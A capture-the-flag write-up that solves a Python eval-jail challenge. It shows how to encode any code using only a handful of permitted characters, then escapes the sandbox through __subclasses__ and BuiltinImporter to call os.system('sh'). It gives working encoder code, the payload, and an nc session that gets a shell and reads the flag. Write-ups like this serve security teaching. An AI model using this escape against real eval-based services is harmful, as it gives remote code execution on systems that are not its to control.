Rating:
Avatar is a 9-line Python application that was exposed on a network socket:
```python
print("You get one chance to awaken from the ice prison.")
code = input("input: ").strip()
whitelist = """gctf{"*+*(=>:/)*+*"}""" # not the flag
if any([x not in whitelist for x in code]) or len(code) > 40000:
print("Denied!")
exit(0)
eval(eval(code, {'globals': {}, '__builtins__': {}}, {}), {'globals': {}, '__builtins__': {}}, {})
```
The application takes a string from the user, checks if that string only contains characters from a whitelist and is not longer than 40,000 characters, and then executes it with `eval(eval(input))`.
The whitelist is very restrictive, the only allowed characters are the following:
```
" ( ) * + / : = > c f g t { }
```
Both `eval` calls are also very restrictive, since they don't allow to access any global variables or built-in functions.
Notably, this is [`eval`](https://docs.python.org/3/library/functions.html#eval) which evaluates just a single expression,
not [`exec`](https://docs.python.org/3/library/functions.html#exec) which would execute multiple statements.
We assumed that the flag was probably stored on the file system, which meant that we had to find a way to read files.
## 1st step: Working around the whitelist
We first need to find a way to encode whatever we want to execute with only the allowed characters.
The double-eval is helpful here, since we can use the following strategy:
1. Use the first `eval` to output what we want to execute, but with only the allowed characters.
2. Use the second `eval` to execute that, and find some way to read files next.
For one moment, assume we that the numbers `0-9` were whitelisted.
With the `{:c}` format string specifier, we could then output any character by its ASCII code:
```python
f"{97:c}"
# => 'a'
```
Assume also, we would have built-in functions like `print` available.
Then we could encode a print statement like this:
```python
eval(eval(f"{112:c}{114:c}{105:c}{110:c}{116:c}({39:c}ctf{39:c})"))
# => "print('ctf')"
```
### Getting numbers without writing numbers
This looks like a promising approach, but unfortunately, numbers are not whitelisted.
What is whitelisted however, are the characters `*`, `+`, `/`, `=`, and `>`, which might be useful in deriving numbers.
What we can do are comparisons.
Consider the following expression that compares if two empty tuples are equal:
```python
()==()
# => True
```
Similarly, we can get `False` by testing if one operand is greater than the other:
```python
()>()
# => False
```
Booleans are not numbers, but `True` is equal to `1` and `False` is equal to `0`.
So, let's do some arithmetic with these. Here is an example that gets us the number `2`:
```python
(()==())+(()==())
# => 2
```
With a little bit of patience, we can now derive all numbers from `0` to `9`.
We also make use of the muliplication operator `*` and exponentiation operator `**` to keep the expressions short:
```python
def encode_number_single_digit(number: int):
if number == 0:
return """()>()"""
if number == 1:
return """()==()"""
if number == 2:
return """(()==())+(()==())""" # 1 + 1
if number == 3:
return """(()==())+(()==())+(()==())""" # 1 + 1 + 1
if number == 4:
return """(()==())+(()==())+(()==())+(()==())""" # 1 + 1 + 1 + 1
if number == 5:
return """(()==())+(()==())+(()==())+(()==())+(()==())""" # 1 + 1 + 1 + 1 + 1
if number == 6:
return """((()==())+(()==()))*((()==())+(()==())+(()==()))""" # 2 * 3
if number == 7:
return """((()==())+(()==()))*((()==())+(()==())+(()==()))+(()==())""" # 2 * 3 + 1
if number == 8:
return """((()==())+(()==()))**((()==())+(()==())+(()==()))""" # 2 ** 3
if number == 9:
return """((()==())+(()==())+(()==()))**((()==())+(()==()))""" # 3 ** 2
```
We did go even further and wrote a function that is able to encode arbitrary numbers.
We do so by finding the closest pair of numbers that, when multiplied or exponentiated,
is closest to the target number, and then add the remaining difference (if any) to the result.
These are some helper functions to find those closest pairs of numbers:
```python
from math import sqrt
def find_closest_tuple(number: int, op, start: int = 1):
curr_tuple = (start, start)
curr_offset = number - op(*curr_tuple)
stop = int(sqrt(number) + 1)
for i in range(start, stop):
for j in range(start, stop):
offset = number - op(i, j)
if offset >= 0 and offset < curr_offset:
curr_offset = offset
curr_tuple = (i, j)
assert curr_offset >= 0
assert number == op(*curr_tuple) + curr_offset
return curr_offset, curr_tuple
def find_closest_mul_tuple(number: int):
return find_closest_tuple(number, lambda x, y: x * y)
def find_closest_pow_tuple(number: int):
return find_closest_tuple(number, lambda x, y: x ** y)
```
Here are some examples to illustrate how this works:
```python
find_closest_mul_tuple(21)
# => 5 + (4 * 4)
find_closest_mul_tuple(42)
# => 6 + (6 * 6)
find_closest_mul_tuple(1337)
# => 41 + (36 * 36)
```
```python
find_closest_pow_tuple(21)
# => 5 + (2 ** 4)
find_closest_pow_tuple(42)
# => 6 + (6 * 2)
find_closest_pow_tuple(1337)
# => 6 + (11 * 3)
```
Actually encoding a number is then just a matter of calling the above functions.
We also try to choose the encoding with the smaller difference, so that the resulting expression is hopefully shorter.
In essence, we can encode any number since the following function is recursive:
```python
def encode_number(number: int):
if number <= 10:
return encode_number_zero_to_ten(number)
mul_off, (m0, m1) = find_closest_mul_tuple(number)
pow_off, (p0, p1) = find_closest_pow_tuple(number)
if mul_off < pow_off:
txt = "(" + encode_number(m0) + ")*(" + encode_number(m1) + ")"
if mul_off > 0:
txt += "+" + encode_number(mul_off)
else:
txt = "(" + encode_number(p0) + ")**(" + encode_number(p1) + ")"
if pow_off > 0:
txt += "+" + encode_number(pow_off)
return txt
```
Let's try it out by encoding the number `100` which is the ASCII code for the character `d`.
It's hard to read, but this is essentially encoding `10**2` then:
```python
encode_number(ord('d'))
# => (((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))
# => 100
```
### Encoding arbitrary strings
We can easily piece together the above building blocks to encode arbitrary strings now:
```python
def encode_text(text: str):
result = ""
for ch in map(ord, text):
result += "{" + encode_number(ch) + ":c}"
return result
```
Let's try it out by encoding the expression `print('ctf')` and wrapping it inside a format string:
```python
encode_text("print('ctf')")
# => f"{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==())+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==()))**((()==())+(()==())+(()==())+(()==())):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==()):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==()):c}{((()==())+(()==())+(()==()))**((()==())+(()==())+(()==())+(()==()))+((()==())+(()==()))**((()==())+(()==())+(()==())+(()==()))+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==()))**((()==())+(()==())+(()==())+(()==())):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+(()==())+(()==()):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==()):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==())+(()==()):c}"
# => "print('ctf')"
```
**Wonderful, we can now encode whatever code we want to execute with just the allowed characters.**
## 2nd step: Getting a shell without built-in functions
To browse the target system for the flag, we attempted to directly get a shell.
However, we can't easily execute `__import__("os").system("sh")` because we have no built-in functions or global variables available.
Luckily, there are [plenty of ways to get to the built-in functions](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes) nonetheless.
After a bit of trial and error, we found the following expression to work well:
```python
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system('sh')
```
This is doing the following:
1. Access the class of the tuple `(1)` with `(1).__class__` and traverse its inheritance tree
2. Find the class `BuiltinImporter` anywhere in that inheritance tree
3. Create an instance of that class with `()`
4. Load the module `os` with `.load_module('os')`
5. Execute the command `sh` with `.system('sh')`
We can encode this expression with the above `encode_text` function to get the [payload.txt](https://www.sigflag.at/assets/posts/glacierctf2023/avatar/payload.txt) (16,764 characters):
```python
payload = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system('sh')"
payload = 'f"{}"'.format(encode_text(payload))
with open("payload.txt", "w") as f:
f.write(payload)
```
One can easily forward that payload to the server and keep the connection open.
Don't forget to press ENTER once to actually send the input.
```python
❯ { cat payload.txt; cat; } | nc chall.glacierctf.com 13384
You get one chance to awaken from the ice prison.
input:
ls
chall.py
flag.txt
cat flag.txt
gctf{But_wh3n_th3_w0rld_n33d3d_h1m_m0st_h3_sp4wn3d_4_sh3ll}
```
**The flag is `gctf{But_wh3n_th3_w0rld_n33d3d_h1m_m0st_h3_sp4wn3d_4_sh3ll}` ?**